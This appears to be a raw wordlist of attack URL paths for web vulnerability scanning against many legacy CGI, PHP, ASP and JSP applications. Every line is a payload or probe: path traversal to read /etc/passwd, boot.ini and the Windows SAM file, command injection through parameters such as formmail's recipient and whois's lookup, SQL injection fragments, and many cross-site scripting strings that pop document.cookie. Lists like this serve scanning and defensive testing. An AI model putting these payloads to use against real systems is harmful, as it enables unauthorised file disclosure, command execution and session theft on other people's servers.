cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
php/php.exe?c:\boot.ini
../../../../../../../../../boot.ini
../../../../winnt/repair/sam._
..\\..\\..\\..\\..\\..\\..\\boot.ini
//etc/passwd
//etc/hosts
///./../.../boot.ini
.cobalt/sysManage/../admin/.htaccess
albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd
autohtml.php?op=modload&mainfile=x&name=/etc/passwd
atomicboard/index.php?location=../../../../../../../../../../etc/passwd
current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
DomainFiles/*//../../../../../../../../../../etc/passwd
docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
index.php?download=/winnt/win.ini
index.php?download=/windows/win.ini
index.php?download=/etc/passwd
index.php?|=../../../../../../../../../etc/passwd
index.php?page=../../../../../../../../../../etc/passwd
index.php?page=../../../../../../../../../../boot.ini
index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd
jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini
k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor
nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0
nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0
phprocketaddin/?page=../../../../../../../../../../boot.ini
phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
phpwebfilemgr/index.php?f=../../../../../../../../../etc
phptonuke.php?filnavn=/etc/passwd
put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd
ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
viewpage.php?file=/etc/passwd
Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
cgi-bin/db4web_c/dbdirname//etc/passwd
cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/faxsurvey?cat%20/etc/passwd
cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
cgi-bin/sbcgi/sitebuilder.cgi
cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
cgi-bin/htsearch?exclude=%60/etc/passwd%60
cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
cgi-bin/php.cgi?/etc/passwd
cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
cgi-bin/opendir.php?/etc/passwd
cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
cgi-bin/multihtml.pl?multi=/etc/passwd%00html
cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
cgi-bin/way-board.cgi?db=/etc/passwd%00
cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
cgi-bin/viewsource?/etc/passwd
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
page.cgi?../../../../../../../../../../etc/passwd
edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
athenareg.php?pass=%20;cat%20/etc/passwd
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
search?NS-query-pat=../../../../../../../../../../etc/passwd
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\temp\temp.class
../../../../../../../../../../etc/passwd
.../.../.../.../.../.../.../.../.../boot.ini
................../etc/passwd
%3f.jsp
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%00
ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
admentor/adminadmin.asp
POSTNUKEMy_eGallery/public/displayCategory.php
cgi-bin/classifieds/index.cgi
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
userinfo.php?uid=1;
site/'
postnuke/index.php?module=My_eGallery
postnuke/html/index.php?module=My_eGallery
cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
phpBB2/search.php?search_id=1\
index.php?module=My_eGallery
author.asp
horde/test.php
examples/cookie
examples/session
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
index.php?option=search&searchword=<script>alert(document.cookie);</script>
emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>
administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>
administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>
administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
index.php?dir=<script>alert('Vulnerable')</script>
https-admserv/bin/index?/<script>alert(document.cookie)</script>
clusterframe.jsp?cluster=<script>alert(document.cookie)</script>
article.cfm?id=1'<script>alert(document.cookie);</script>
upload.php?type=\"<script>alert(document.cookie)</script>
soinfo.php?\"><script>alert('Vulnerable')</script>
modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
666%0a%0a<script>alert('Vulnerable');</script>666.jsp
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
<script>alert('Vulnerable')</script>.shtm
<script>alert('Vulnerable')</script>.stm
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&Retur
SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>
nosuchurl/><script>alert('Vulnerable')</script>
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
cgi-bin/vq/demos/respond.pl?<script>alert('Vulnerable')</script>
cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
cgi-bin/myguestbook.cgi?action=view
cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
cgi-bin/diagnose.cgi
cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
cgi-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
~/<script>alert('Vulnerable')</script>.aspx
~/<script>alert('Vulnerable')</script>.asp
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
catinfo?<u><b>TESTING
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
webamil/test.php
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
user.php?op=userinfo&uname=<script>alert('hi');</script>
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
search/index.cfm?<script>alert(\"Vulnerable\")</script>
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
search.php?zoom_query=<script>alert(\"hello\")</script>
search.php?searchstring=<script>alert(document.cookie)</script>
search.php?searchfor=\"><script>alert('Vulnerable');</script>
search.asp?term=<%00script>alert('Vulnerable')</script>
script>alert('Vulnerable')</script>.cfm
samples/search.dll?query=<script>alert(document.cookie)</script>
replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>
profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft
postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1
pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello
pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit
phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]
phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>
phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>
phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
phptonuke.php?filnavn=<script>alert('Vulnerable')</script>
phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E
phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>
phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>
phpimageview.php?pic=javascript:alert('Vulnerable')
phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>
phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>
phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>
pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1
pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;
node/view/666\"><script>alert(document.domain)</script>
netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
nav/cList.php?root=</script><script>alert('Vulnerable')/<script>
myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=
myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent
myhome.php?action=messages&box=<script>alert('Vulnerable')</script>
msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>
msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>
msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>
modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>
modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2
modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0
modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>
modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|
modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>
modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>
modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>
modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test
modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>
modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>
modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>
modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index
members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22
megabook/admin.cgi?login=<script>alert('Vulnerable')</script>
mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
mailman/listinfo/<script>alert('Vulnerable')</script>
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
jigsaw/
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script
index.php/\"><script><script>alert(document.cookie)</script><
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchBu
include.php?path=contact.php&contact_email=\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;
html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E
gallery/search.php?searchstring=<script>alert(document.cookie)</script>
friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>
forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>
forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>
esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview
cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>
cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\"><
chat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E
calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>
ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f
bb000001.pl<script>alert('Vulnerable')</script>
article.php?sid=\"><Img
apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>
anthill/login.php
admin/login.php?path=\"></form><form
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
addressbook/index.php?name=<script>alert('Vulnerable')</script>
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
a?<script>alert('Vulnerable')</script>
a.jsp/<script>alert('Vulnerable')</script>
?mod=<script>alert(document.cookie)</script>&op=browse
<script>alert('Vulnerable')</script>.thtml
<script>alert('Vulnerable')</script>.shtml
<script>alert('Vulnerable')</script>.jsp
<script>alert('Vulnerable')</script>.aspx
/profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
cgi-bin/title.cgi
cgi-bin/compatible.cgi
add_user.php
cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
cgi-bin/retrieve_password.pl
cgi-bin/wwwadmin.pl
cfdocs/expeval/displayopenedfile.cfm
cfdocs/expeval/sendmail.cfm
cgi-bin/bigconf.cgi
cgi-bin/webmap.cgi
cgi-bin/wwwwais
ammerum/
ariadne/
cbms/cbmsfoot.php
cbms/changepass.php
cbms/editclient.php
cbms/passgen.php
cbms/realinv.php
cbms/usersetup.php
cgi-bin/admin/admin.cgi
cgi-bin/admin/setup.cgi
cgi-bin/mt-static/mt-load.cgi
cgi-bin/mt-static/mt.cfg
cgi-bin/mt/mt-load.cgi
cgi-bin/mt/mt.cfg
cgi-bin-sdb/printenv
